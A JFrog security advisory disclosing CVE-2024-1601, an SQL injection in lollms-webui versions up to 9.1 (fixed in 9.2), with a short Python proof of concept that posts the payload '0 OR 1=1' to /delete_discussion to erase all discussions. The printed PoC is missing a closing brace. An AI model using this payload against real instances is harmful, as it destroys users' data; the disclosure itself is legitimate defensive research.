JFrog Security Research
< Back

JFSA-2024-001028813 - lollms-webui SQLi DoS

CVE-2024-1601 | CVSS 7.5

JFrog Severity:high

Discovered ByNaveh Racovskyof the JFrog Security Research Team

Published 15 Apr, 2024 | Last updated 15 Apr, 2024

SQL Injection in lollms-webui leads to denial of service


(,9.1], Fixed in 9.2

An SQL injection condition exists in delete_discussion(), allowing a malicious actor to delete all discussions and message data from the application. This vulnerability can simply be exploited by sending a crafted HTTP POST request to the /delete_discussion which will call the vulnerable internal delete_discussion() function.

// PoC.py
import requests

IP_ADDRESS = "aaa.bbb.ccc.ddd" #replace me
PORT = 9600

data = {
    "id": "0 OR 1=1",
    "client_id": 0
response = requests.post(f"http://{IP_ADDRESS}:{str(PORT)}/delete_discussion", json=data)

No mitigations are supplied for this issue


< Back